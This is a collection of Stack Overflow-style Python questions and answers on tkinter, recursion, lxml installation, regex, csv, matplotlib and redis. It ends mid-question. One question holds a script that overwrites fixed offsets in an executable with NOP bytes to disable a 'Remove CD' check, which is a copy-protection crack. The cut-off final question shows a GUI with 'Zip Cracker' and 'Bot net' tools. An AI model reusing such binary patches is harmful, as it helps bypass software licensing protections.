Why the code produces this answer? [Python] Question: Basically I'm setting up a code, but for some random reason it always says the answers are wrong. So, say it is '10 x 10' & I would say it is '100' The code however says back to me, '**`I'm sorry the answer is 100`** ' **Why the code produces this answer?** Here is the code: P.S.: I know that I do not have to do '`Num_(NUMBER)`' for all of it! from random import randint import random correct = 0 for i in range (3): num_1 = randint (1, 10) num_2 = randint (1, 10) prob1 = num_1*num_2 print (“What’s %d x %d? “ (num_1, num_2)) ans1 = input () If ans1 == prob1: print (“That’s the correct answer! /n”) correct = correct +1 else: print (“No I’m afraid the answer is %d. /n” & (prob1)) for n in range (3): num_3 = randint (1, 10) num_4 = randint (1, 10) prob2 = num_3+num_4 print (“What’s %d + %d? “ (num_3, num_4)) ans2 = input () If ans2 == prob2: print (“That’s the correct answer! /n”) correct = correct +1 else: print (“No I’m afraid the answer is %d. /n” & (prob2)) for m in range (4): num_5 = randint (1, 10) num_6 = randint (1, 10) prob3 = num_5 - num_6 print (“What’s %d - %d? “ (num_5, num_6)) ans3 = input () If ans3 == prob3: print (“That’s the correct answer! /n”) correct = correct +1 else: print (“No I’m afraid the answer is %d. /n” & (prob3)) print (“I asked you 10 questions, you got %d of them right. “ %(correct)) exit() Answer: the probe variable is an integer type. the answer that you get from the user is a string. test it this with: > print type(ans1) > > print type(prob1) so you need to convert the input from the user to an integer: > if int(ans1) == prob1
Python3 - tkinter importing and using module Question: I am having trouble importing and using a module I have created. I have patcher.py and I would like to import modules from patches.py but I get an error when trying to import and use disable_removecd. I am now a little confused on how to set it up properly and how to import and use it correctly. patcher.py #import the tkinter module from tkinter import * from tkinter.filedialog import askopenfilename import bsdiff4 from patches import * #bsdiff4.file_patch(dst, dst, patch) #create a new class class Application(Frame): def __init__(self, master): super(Application, self).__init__(master) self.grid(row = 2, sticky = W+E+N+S) #,padx=300 cmexecutable = askopenfilename() print(cmexecutable) self.mainmenu() def mainmenu(self): self.logo = PhotoImage(file='logo.gif') self.image = Label(self, image=self.logo) self.image.grid(columnspan = 2) self.image.configure(background='black') #self.bttn1 = Button(self, text = 'Country Specific') self.bttn1 = Button(self, text = 'Disable Remove CD Message') self.bttn1['command'] = disable_removecd(self) self.bttn1.grid(columnspan = 2 ,sticky = W+E+N+S) patches.py from patcher import * def disable_removecd(): offset1 = 0x42a98b offset2 = 0x42a98c offset3 = 0x42a98d offset4 = 0x42a98e offset5 = 0x42a98f offset6 = 0x42e400 offset7 = 0x42e401 offset8 = 0x42e402 offset9 = 0x42e403 offset10 = 0x42e404 newvalue1 = b'\x90' newvalue2 = b'\x90' newvalue3 = b'\x90' newvalue4 = b'\x90' newvalue5 = b'\x90' newvalue6 = b'\x90' newvalue7 = b'\x90' newvalue8 = b'\x90' newvalue9 = b'\x90' newvalue10 = b'\x90' with open(cmexecutable, 'r+b') as victim: victim.seek(offset1) victim.write(newvalue1) victim.seek(offset2) victim.write(newvalue2) victim.seek(offset3) victim.write(newvalue3) victim.seek(offset4) victim.write(newvalue4) victim.seek(offset5) victim.write(newvalue5) victim.seek(offset6) victim.write(newvalue6) victim.seek(offset7) victim.write(newvalue7) victim.seek(offset8) victim.write(newvalue8) victim.seek(offset9) victim.write(newvalue9) victim.seek(offset10) victim.write(newvalue10) When I run patcher.py I get this error: self.bttn1['command'] = disable_removecd(self) NameError: name 'disable_removecd' is not defined What am I doing wrong? Answer: The following line in `patches.py` causes a cyclic import. from patcher import * I think you used that line to use `cmexecutable` in the `disable_removecd` function. Remove the above line. And pass the value of `cmexecutable` explicitly. _patcher.py_ : ... class Application(Frame): def __init__(self, master): super(Application, self).__init__(master) self.grid(row=2, sticky=W+E+N+S) cmexecutable = askopenfilename() self.mainmenu(cmexecutable) def mainmenu(self, cmexecutable): self.logo = PhotoImage(file='logo.gif') self.image = Label(self, image=self.logo) self.image.grid(columnspan=2) self.image.configure(background='black') self.bttn1 = Button(self, text = 'Disable Remove CD Message') self.bttn1['command'] = lambda: disable_removecd(cmexecutable) # ^^ set up callback instead of calling it immediately using `lambda`. self.bttn1.grid(columnspan=2 ,sticky=W+E+N+S) * * * The function `disable_removecd` in `patches.py` should be modified to accept `cmexecutable` as a parameter: def disable_removecd(cmexecutable): ....
Python Zelle Graphics - Recursive functions in drawing? Question: ![the goal](http://web.cs.swarthmore.edu/~grace/cs21/f14/labs/09/diamonds.jpg) ![enter image description here](http://i.stack.imgur.com/ZMMaD.png) import graphics def main(): window = graphics.GraphWin("x", 600, 400) cntr = graphics.Point(300,200) size = 200 wrapdiamond(size, window,cntr) window.getMouse() def wrapdiamond(size, window,cntr): count = 0 if count == 4: return if count < 4: diamond(size,window,"black", cntr) x= cntr.getX()+-0.5*size y = cntr.getY()+-0.5*size cntr= graphics.Point(x,y) size = size*0.33 count +=1 diamond(size,window,"black", cntr) def diamond(size,window,color,cntr): p1 = cntr.clone() p1.move(0,-0.5*size) x1 = p1.getY() newcntr = graphics.Point(300,x1) p2 = cntr.clone() p2.move(-0.5*size,0) p3 = cntr.clone() p3.move(0,0.5*size) p4 = cntr.clone() p4.move(0.5*size,0) diamond= graphics.Polygon(p1, p2, p3, p4) diamond.setFill("black") diamond.draw(window) So the top picture is my goal. I need to do this recursively (calling the same function), shifting the center point, size, and color. I feel like my current method is very likely to have me hardcoding much of this. How would I implement this recursively? Answer: If you're stuck with recursion, this could get you started again def rdraw(x,y,level=1,max_level=5): draw_diamond(level) d = distance(level) if (level+1)<=max_level: rdraw(x+d,y+d,level+1) rdraw(x+y,y-d,level+1) rdraw(x-y,y+d,level+1) rdraw(x-y,y-d,level+1) rdraw(0,0)
tkinter grid: distribute rows and columns over frame height and width Question: Using python 3.4.1 on Mac OS I'm trying to distribute label and entry widgets equally using the grid geometry manager in a subframe called 'lowerframe'. My current MWE is shown below: #!/usr/bin/env python3 from tkinter import * from tkinter import ttk class Window(Frame): def __init__(self, master=None): Frame.__init__(self, master) # create master window self.master = master # create root window on initialization self.create_rootwindow() def create_rootwindow(self): self.master.title("GUI") self.master.geometry("1024x748") self.master.resizable(width=FALSE, height=FALSE) self.create_upperframe() self.create_lowerframe() self.create_inputentries() self.create_btnframe() self.create_inputbtn() def create_upperframe(self): self.upperframe = Frame(self.master, width=980, height=490) self.upperframe.config(background="#339900") self.upperframe.place(x=20, y=10) def create_lowerframe(self): self.lowerframe = Frame(self.master, width=830, height=200) self.lowerframe.config(background="#336699") self.lowerframe.place(x=20, y=530) def create_inputentries(self): self.create_lowerframe() parameternames = [ ('a', 'U'), ('b', 'U'), ('c', 'U'), ('d', 'U'), ('e', 'U'), ('f', 'U'), ('g', 'U'), ('h', 'U'), ('i', 'U'), ('j', 'U'), ('k', 'U'), ('l', 'U'), ('m', 'U'), ('n', 'U'), ('o', 'U'), ('p', 'U'), ('q', 'U'), ('r', 'U'), ('s', 'U'), ('t', 'U')] for i, data in enumerate(parameternames): r = i % 5 c = (i // 5) * 3 Label(self.lowerframe, text=data[0]).grid(row=r, column=c, pady=4, padx=0) Entry(self.lowerframe, width=10).grid(row=r, column=c+1, pady=4, padx=0) Label(self.lowerframe, text=data[1]).grid(row=r, column=c+2, pady=4, padx=0) def create_btnframe(self): self.btnframe = Frame(self.master, width=130, height=200) self.btnframe.place(x=870, y=530) def create_inputbtn(self): self.create_btnframe() startanalysis_btn = Button(self.btnframe, text="Start Analysis", width=12, command=self.do_nothing) startanalysis_btn.place(x=0, y=0) abortanalysis_btn = Button(self.btnframe, text="Abort Analysis", width=12, command=self.do_nothing) abortanalysis_btn.place(x=0, y=50) resetanalysis_btn = Button(self.btnframe, text="Reset Analysis", width=12, command=self.do_nothing) resetanalysis_btn.place(x=0, y=100) showresults_btn = Button(self.btnframe, text="Show Results", width=12, command=self.do_nothing) showresults_btn.place(x=0, y=200, anchor=SW) def do_nothing(self): pass root = Tk() app = Window(root) root.mainloop() As you can see, each "set" of widgets in the lower, blue frame (called 'lowerframe') consists of a label with the description (here 'a' to 't'), a entry widget and another label widget with the according unit of the input value (here 'U' for all labels). Using these "sets" I need to create five rows and 4 "set columns" (12 columns using grid geometry manager currently). My aim is to distribute those rows and "set columns" over to the specified height and width of lowerframe. \-- EDIT: I uploaded a [sketch](https://dl.dropboxusercontent.com/u/7203428/SO/lowerframe_sketch.png) to my Dropbox folder showing how the result should look like. Answer: The way you've written your code makes it very hard to modify. For one, as a rule of thumb you should never use `place`. There's simply no need because `pack` and `grid` provide much more functionality. Second, as another rule of thumb, a parent should be responsible for laying out its children -- don't have a function that creates a frame also call `grid`, `pack`, or `place` to put itself in its parent. If you decide to change your layout you end up having to change a bunch of functions instead of one. Finally, when using grid you need to give rows and columns "weight" if you want them to grow to fill their containing window. Here's how I would rewrite your code: from tkinter import * class Window(Frame): def __init__(self, master=None): Frame.__init__(self, master) # create master window self.master = master # create root window on initialization self.create_rootwindow() def create_rootwindow(self): self.master.title("GUI") self.master.geometry("1024x748") self.create_upperframe() self.create_lowerframe() self.create_inputentries() self.create_btnframe() self.create_inputbtn() self.upperframe.pack(side="top", fill="both", expand=True, padx=4) self.lowerframe.pack(side="left", fill="both", expand=True, padx=4, pady=4) self.btnframe.pack(side="right", fill="both", padx=4, pady=4) def create_upperframe(self): self.upperframe = Frame(self.master, width=980, height=490) self.upperframe.config(background="#339900") def create_lowerframe(self): self.lowerframe = Frame(self.master, width=830, height=200) self.lowerframe.config(background="#336699") def create_inputentries(self): self.create_lowerframe() parameternames = [ ('a', 'U'), ('b', 'U'), ('c', 'U'), ('d', 'U'), ('e', 'U'), ('f', 'U'), ('g', 'U'), ('h', 'U'), ('i', 'U'), ('j', 'U'), ('k', 'U'), ('l', 'U'), ('m', 'U'), ('n', 'U'), ('o', 'U'), ('p', 'U'), ('q', 'U'), ('r', 'U'), ('s', 'U'), ('t', 'U')] for i, data in enumerate(parameternames): r = i % 5 c = (i // 5) * 3 Label(self.lowerframe, text=data[0]).grid(row=r, column=c, pady=4, padx=0, sticky="nsew") Entry(self.lowerframe, width=10).grid(row=r, column=c+1, pady=4, padx=0, sticky="ew") Label(self.lowerframe, text=data[1]).grid(row=r, column=c+2, pady=4, padx=0, sticky="nswe") self.lowerframe.grid_columnconfigure(c+1, weight=1) def create_btnframe(self): self.btnframe = Frame(self.master, width=130, height=200) def create_inputbtn(self): self.create_btnframe() startanalysis_btn = Button(self.btnframe, text="Start Analysis", width=12, command=self.do_nothing) abortanalysis_btn = Button(self.btnframe, text="Abort Analysis", width=12, command=self.do_nothing) resetanalysis_btn = Button(self.btnframe, text="Reset Analysis", width=12, command=self.do_nothing) showresults_btn = Button(self.btnframe, text="Show Results", width=12, command=self.do_nothing) startanalysis_btn.pack(side="top", fill="x") abortanalysis_btn.pack(side="top", fill="x") resetanalysis_btn.pack(side="top", fill="x") showresults_btn.pack(side="top", fill="x") def do_nothing(self): pass root = Tk() app = Window(root) root.mainloop() **Things to notice:** * I've replaced all uses of `place` with `pack` (though `grid` would work just as well) * I've grouped the `pack`ing of the major areas together after they have been created * I've grouped the `pack`ing of the buttons together, making it arguably easier to visualize and modify * I've added a weight to the columns that have entry widgets in the bottom frame. That causes those columns to grow or shrink to fill any extra space * I've removed setting resizable to false. In general I think the user should be allowed to choose the size of the GUI. Plus, it illustrates that by using `pack` and/or `grid` instead of `place`, you get proper resize behavior without any extra effort. If you really think you know better than your users, you can put it back in. The code now has good resize behavior, the grid of entry widgets expands to fill its container, and the functions are less tightly coupled since a function that creates a frame doesn't have to know how that frame will be displayed.
Python: error when installing lxml on OS X Question: For whatever I'm installing with pip, I got this: Command /usr/bin/python -c "import setuptools, tokenize;__file__='/private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml/setup.py';exec(compile(getattr(tokenize, 'open', open)(__file__).read().replace('\r\n', '\n'), __file__, 'exec'))" install --record /var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip-0wnEw6-record/install-record.txt --single-version-externally-managed --compile failed with error code 1 in /private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml Storing debug log for failure in /Users/youweizhu/Library/Logs/pip.log For example: $ pip install lxml I got Downloading/unpacking lxml Downloading lxml-3.4.1.tar.gz (3.5MB): 3.5MB downloaded Running setup.py (path:/private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml/setup.py) egg_info for package lxml /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/dist.py:267: UserWarning: Unknown distribution option: 'bugtrack_url' warnings.warn(msg) Building lxml version 3.4.1. Building without Cython. Using build configuration of libxslt 1.1.28 warning: no previously-included files found matching '*.py' Installing collected packages: lxml Running setup.py install for lxml /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/dist.py:267: UserWarning: Unknown distribution option: 'bugtrack_url' warnings.warn(msg) Building lxml version 3.4.1. Building without Cython. Using build configuration of libxslt 1.1.28 building 'lxml.etree' extension cc -fno-strict-aliasing -fno-common -dynamic -arch x86_64 -arch i386 -g -Os -pipe -fno-common -fno-strict-aliasing -fwrapv -DENABLE_DTRACE -DMACOSX -DNDEBUG -Wall -Wstrict-prototypes -Wshorten-64-to-32 -DNDEBUG -g -fwrapv -Os -Wall -Wstrict-prototypes -DENABLE_DTRACE -arch x86_64 -arch i386 -pipe -I/usr/include/libxml2 -I/private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml/src/lxml/includes -I/System/Library/Frameworks/Python.framework/Versions/2.7/include/python2.7 -c src/lxml/lxml.etree.c -o build/temp.macosx-10.9-intel-2.7/src/lxml/lxml.etree.o -w -flat_namespace In file included from src/lxml/lxml.etree.c:239: /private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml/src/lxml/includes/etree_defs.h:14:10: fatal error: 'libxml/xmlversion.h' file not found #include "libxml/xmlversion.h" ^ 1 error generated. error: command 'cc' failed with exit status 1 Complete output from command /usr/bin/python -c "import setuptools, tokenize;__file__='/private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml/setup.py';exec(compile(getattr(tokenize, 'open', open)(__file__).read().replace('\r\n', '\n'), __file__, 'exec'))" install --record /var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip-0wnEw6-record/install-record.txt --single-version-externally-managed --compile: /System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/distutils/dist.py:267: UserWarning: Unknown distribution option: 'bugtrack_url' warnings.warn(msg) Building lxml version 3.4.1. Building without Cython. Using build configuration of libxslt 1.1.28 running install running build running build_py creating build creating build/lib.macosx-10.9-intel-2.7 creating build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/__init__.py -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/_elementpath.py -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/builder.py -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/cssselect.py -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/doctestcompare.py -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/ElementInclude.py -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/pyclasslookup.py -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/sax.py -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/usedoctest.py -> build/lib.macosx-10.9-intel-2.7/lxml creating build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/__init__.py -> build/lib.macosx-10.9-intel-2.7/lxml/includes creating build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/__init__.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/_diffcommand.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/_html5builder.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/_setmixin.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/builder.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/clean.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/defs.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/diff.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/ElementSoup.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/formfill.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/html5parser.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/soupparser.py -> build/lib.macosx-10.9-intel-2.7/lxml/html copying src/lxml/html/usedoctest.py -> build/lib.macosx-10.9-intel-2.7/lxml/html creating build/lib.macosx-10.9-intel-2.7/lxml/isoschematron copying src/lxml/isoschematron/__init__.py -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron copying src/lxml/lxml.etree.h -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/lxml.etree_api.h -> build/lib.macosx-10.9-intel-2.7/lxml copying src/lxml/includes/c14n.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/config.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/dtdvalid.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/etreepublic.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/htmlparser.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/relaxng.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/schematron.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/tree.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/uri.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/xinclude.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/xmlerror.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/xmlparser.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/xmlschema.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/xpath.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/xslt.pxd -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/etree_defs.h -> build/lib.macosx-10.9-intel-2.7/lxml/includes copying src/lxml/includes/lxml-version.h -> build/lib.macosx-10.9-intel-2.7/lxml/includes creating build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources creating build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/rng copying src/lxml/isoschematron/resources/rng/iso-schematron.rng -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/rng creating build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl copying src/lxml/isoschematron/resources/xsl/RNG2Schtrn.xsl -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl copying src/lxml/isoschematron/resources/xsl/XSD2Schtrn.xsl -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl creating build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl/iso-schematron-xslt1 copying src/lxml/isoschematron/resources/xsl/iso-schematron-xslt1/iso_abstract_expand.xsl -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl/iso-schematron-xslt1 copying src/lxml/isoschematron/resources/xsl/iso-schematron-xslt1/iso_dsdl_include.xsl -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl/iso-schematron-xslt1 copying src/lxml/isoschematron/resources/xsl/iso-schematron-xslt1/iso_schematron_message.xsl -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl/iso-schematron-xslt1 copying src/lxml/isoschematron/resources/xsl/iso-schematron-xslt1/iso_schematron_skeleton_for_xslt1.xsl -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl/iso-schematron-xslt1 copying src/lxml/isoschematron/resources/xsl/iso-schematron-xslt1/iso_svrl_for_xslt1.xsl -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl/iso-schematron-xslt1 copying src/lxml/isoschematron/resources/xsl/iso-schematron-xslt1/readme.txt -> build/lib.macosx-10.9-intel-2.7/lxml/isoschematron/resources/xsl/iso-schematron-xslt1 running build_ext building 'lxml.etree' extension creating build/temp.macosx-10.9-intel-2.7 creating build/temp.macosx-10.9-intel-2.7/src creating build/temp.macosx-10.9-intel-2.7/src/lxml cc -fno-strict-aliasing -fno-common -dynamic -arch x86_64 -arch i386 -g -Os -pipe -fno-common -fno-strict-aliasing -fwrapv -DENABLE_DTRACE -DMACOSX -DNDEBUG -Wall -Wstrict-prototypes -Wshorten-64-to-32 -DNDEBUG -g -fwrapv -Os -Wall -Wstrict-prototypes -DENABLE_DTRACE -arch x86_64 -arch i386 -pipe -I/usr/include/libxml2 -I/private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml/src/lxml/includes -I/System/Library/Frameworks/Python.framework/Versions/2.7/include/python2.7 -c src/lxml/lxml.etree.c -o build/temp.macosx-10.9-intel-2.7/src/lxml/lxml.etree.o -w -flat_namespace In file included from src/lxml/lxml.etree.c:239: /private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml/src/lxml/includes/etree_defs.h:14:10: fatal error: 'libxml/xmlversion.h' file not found #include "libxml/xmlversion.h" ^ 1 error generated. error: command 'cc' failed with exit status 1 ---------------------------------------- Cleaning up... Command /usr/bin/python -c "import setuptools, tokenize;__file__='/private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml/setup.py';exec(compile(getattr(tokenize, 'open', open)(__file__).read().replace('\r\n', '\n'), __file__, 'exec'))" install --record /var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip-0wnEw6-record/install-record.txt --single-version-externally-managed --compile failed with error code 1 in /private/var/folders/kn/mmhj7w0n54s4b2jr08sx46kr0000gn/T/pip_build_youweizhu/lxml Storing debug log for failure in /Users/youweizhu/Library/Logs/pip.log I'm crying... Answer: Andre Augusto pointed out > If you want to use lxml together with the official libxml2 Python bindings > (maybe because one of your dependencies uses it), you must build lxml > statically. Otherwise, the two packages will interfere in places where the > libxml2 library requires global configuration, which can have any kind of > effect from disappearing functionality to crashes in either of the two. > > To get a static build, either pass the --static-deps option to the setup.py > script, or run pip with the STATIC_DEPS or STATICBUILD environment variable > set to true, i.e. > > STATIC_DEPS=true pip install lxml > > The STATICBUILD environment variable is handled equivalently to the > STATIC_DEPS variable, but is used by some other extension packages, too. from the lxml docs here.. <http://lxml.de/installation.html#using-lxml-with- python-libxml2> his original post is here: [Cannot install Lxml on Mac os x 10.9](http://stackoverflow.com/questions/19548011/cannot-install-lxml-on-mac- os-x-10-9) There's some other ios related fixes there as well.
How to pass a class/module definition into another file Question: I'm a beginner in OOP Python and I just wanna know this: This is **file.py** : class Card(): def __init__(self, rank, suit): """Initialization method""" self.rank = rank self.suit = suit def get_rank(self): """Function get_rank returns a rank (value) of the card""" return self.rank When I wanna create and pass an object to the function "get_rank" in this file, I can do this: card1 = Card(10,"Diamond") card1.get_rank() But how can I create and pass an object in another file? There is another file called **test_file.py** , it's a testing file (py.test). So **file.py** is for code only, **test_file.py** represents parameters (variables and objects) which are passed to **file.py**. In **test_file.py** is also variable "expected_result" with a correct result. Then when I use "py.test" (bash), it shows me, if the result is correct or not. I understand this non-OOP example: **abs.py** : `def split_text(text): - code -` **test_abs.py** : def test(): text = 'abcdefgh' Please help, thanks for any advice :) Answer: In your `test_file.py`: from file import Card ... card1 = Card(10, "Diamond") # Do something with it By the way, do not name your file file.py: `file` is a built-in function.
Python: Remove text between <Table></Table> from text Question: I am still relatively new to the use of `regex` in Python and I am struggling to find a way to remove the content between the tags in a very simple .txt file. See this [file](https://www.dropbox.com/s/tnpm55xe1ovh7ow/0001047469-98-044981.txt?dl=0) for example. Here's what I've tried: fdir = open("C:\\file.txt") line = fdir.read() line = line.lower() pattern = re.compile("(?is)<table[^>]*>(.*?)<\/table>", re.MULTILINE) line = pattern.sub('', line) and fdir = open("C:\\file.txt") line = fdir.read() line = re.sub(r"(?is)<table[^>]*>(.*?)<\/table>", '', line, re.DOTALL) Both codes simply remove the tags `<Table>` and `<\Table>` in my text file and not what is in between. What's missing in my code? **I want the tags to be deleted as well.** Answer: You should consider using [BeautifulSoup](http://www.crummy.com/software/BeautifulSoup/bs4/doc/) to remove these tags ... >>> from bs4 import BeautifulSoup >>> soup = BeautifulSoup(html) >>> for t in soup.find_all('table'): ... t.decompose()
Python TypeError: coercing to Unicode: need string or buffer, file found Question: I am into learning Python, with a C- language background. Sorry, if my problem is 'naive' or 'too simple' or 'didn't worked enough'. In the below code, I want to practice for future problems, the removal of specific rows by the 'set' data-structure. But, first of all: it fails to match the removal set contents. Also, the second issue: is the error in o/p. This can be checked by making the indented block work instead. The trimmed data file is : **marks_trim.csv** > "Anaconda Systems Campus Placement",,,,,, > > "Conducted on:",,,"30 Feb 2011",,, > > "Sno","Math","CS","GK","Prog","Comm","Sel" > > 1,"NA","NA","NA",4,0,0 * * * import csv, sys, re, random, os, time, io, StringIO datfile = sys.argv[1] outfileName = sys.argv[2] outfile = open(outfileName, "w") count = 0 removal_list = set() tmp = list() i=0 re_pattern = "\d+" with open(datfile, 'r') as fp: reader1 = csv.reader(fp) for row in reader1: if re.match(re_pattern, row[0]): for cols in row: removal_list.add(tuple(cols)) #as tuple is hashable print "::row>>>>>>",row print "::removal_list>>>>>>>>",removal_list convert = list(removal_list) print "<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>" print convert f = open(datfile, 'r') reader2 = csv.reader(f) print "" print "Removal List Starts" print removal_list print "Removal List Ends\n" new_a_buf = io.BytesIO() # StringIO.StringIO() : both 'io' & StringIO' work writer = csv.writer(new_a_buf) rr ="" j = 0 for row in reader2: if row not in convert: # removal_list: not used as list not hashable writer.writerow(row) #outfile.write(new_a_buf) ''' #below code using char array isn't used as it doesn't copy structure of csv file for cols in row: #at indentation level of "if row not in convert", stated above if cols not in convert: # removal_list: not used as list not hashable for j in range(0,len(cols)): rr+=cols[j] #at indentation level of "if cols not in convert:" outfile.write(rr) # at the indentation level of 'if' print "<<<<<<<<<<<<<<<<", rr f = open(outfile, 'r') reader2 = csv.reader(f) ''' new_a_buf.seek(0) reader2 = csv.reader(new_a_buf) for row in reader2: print row * * * **Problem/Issue** : The common error (i.e. using char array / csv.writer object) in the o/p is also giving the rows to be deleted, i.e. by occurrence in `removal_list`. However, in the approach using char array for retrieving left-out rows, the error is : > Traceback (most recent call last): > > File "test_list_in_set.py", line 51, in > > f = open(outfile, 'r') > > TypeError: coercing to Unicode: need string or buffer, file found Answer: I didn't read through all that code - but it mostly doesn't seem relevant. The error is to do with opening a file: `open` takes a filename, but you are passing it `outfile`, which is already a file. You should close that file first then pass `outfileName` to open.
Python Matplotlib custom style error Question: i'm trying to use a custom matplotlib-style But it does not work: As mentioned here: <http://matplotlib.org/users/style_sheets.html> i tried the following: import matplotlib.pyplot as plt print plt.style.available `matplotlib.pyplot` works fine. But it keeps saying that style is not defined. >>> import matplotlib.pyplot as plt >>> print plt.style.available Traceback (most recent call last): File "<stdin>", line 1, in <module> AttributeError: 'module' object has no attribute 'style' What is the solution? It is Mac Os X Yosemite and it is installed as Administrator in the default location. Answer: _Styles_ are a very recent feature of `matplotlib`, introduced in version 1.4. * If your version of matplotlib is up-to-date then you are suffering from a bug of the installation procedure * If your version is older than 1.4 then it is not expected that you have style sheets installed. To look at your version, do the following (my `matplotlib` is old...) >>> import matplotlib >>> matplotlib.__version__ '1.3.1' >>>
Convert redis hash to python dict? Question: Suppose I have a python dict `aa = {"name": "nilesh", "age":29}` When I store it in redis hash, all datatypes changes to string. import redis r = redis.StrictRedis() r.hmset("nilesh_123", aa) bb = r.hgetall("nilesh_123") Now bb comes as `{'age': '29', 'name': 'nilesh'}`. Is is there any pythonic way to convert this hash returned value to python dict format again ? One way which I see is to store all the datatypes of dictionary values somewhere and then convert them again when I get that hash by iterating the redis hash value, but I am looking for better pythonic solution. I can store the dict as pickled object in a redis string and then get it and loads it again using pickle, but I am more interested in using hashes compare to strings. Answer: {'age': '29', 'name': 'nilesh'} is JSON format, try to look for tools that can convert JSON to python dict like: [Converting JSON into Python dict](http://stackoverflow.com/questions/2485817/converting-json-into-python- dict)
Error: Attribute error in TCL Question: I am trying to create an application in Python GUI using tkinter. Here is the code I'm using for the GUI part. Whenever I try to access my Entry Widget I get error. Ex:Sin_put.get() should give me the text in the Entry widget but it gives me an error AttributeError: 'NoneType' object has no attribute 'get' I'm relatively new to Python. So if you guys have any suggestions to improve the functionality you're most welcome. from tkinter import * from tkinter import ttk sys.path.insert(0, 'home/ashwin/') import portscanner class App: def __init__(self, master): master.option_add('*tearOff', False) master.resizable(False,False) self.nb = ttk.Notebook(master) self.nb.pack() self.nb.config(width=720,height=480) self.zipframe = ttk.Frame(self.nb) self.scanframe = ttk.Frame(self.nb) self.botframe = ttk.Frame(self.nb) self.mb = Menu(master) master.config(menu = self.mb) file = Menu(self.mb) info = Menu(self.mb) self.mb.add_cascade(menu = file, label = 'Tools') self.mb.add_cascade(menu = info, label = 'Help') file.add_command(label='Zip Cracker', command = self.zipframe_create) file.add_command(label='Port Scanner', command = self.scanframe_create) file.add_command(label='Bot net', command =self.botframe_create) info.add_command(label='Usage', 